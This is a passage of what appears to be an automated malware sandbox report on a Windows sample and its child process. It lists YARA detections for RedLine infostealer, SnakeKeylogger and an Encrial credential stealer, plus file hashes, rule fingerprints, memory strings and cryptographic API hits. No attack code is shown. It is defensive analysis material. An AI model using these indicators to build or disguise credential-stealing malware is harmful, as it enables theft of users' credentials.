          Source: y79a2l1FY5.exe, 00000000.00000003.878119908.000000007EBC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000003.878119908.000000007EC06000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000003.878119908.000000007EC06000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000002.913261690.00000000210D9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ED16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ED16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exe, 00000000.00000003.878633103.000000000089E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs y79a2l1FY5.exe
          Source: y79a2l1FY5.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: 7.1.dajivhqI.pif.46b268.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.2.dajivhqI.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.1.dajivhqI.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.2.dajivhqI.pif.438038.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.2.dajivhqI.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0.2.y79a2l1FY5.exe.212c9ba8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.1.dajivhqI.pif.438038.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0.2.y79a2l1FY5.exe.212c9ba8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.2.dajivhqI.pif.46b268.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.1.dajivhqI.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.2b326458.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.438038.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2a0c0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.y79a2l1FY5.exe.212fcdd8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.3.dajivhqI.pif.282772e8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.1.dajivhqI.pif.438038.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.29f70a4e.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.29f71936.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.2b325570.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.2b34e390.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.2a160000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000007.00000001.881378637.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000007.00000002.3350716480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Process Memory Space: dajivhqI.pif PID: 6164, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
          Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
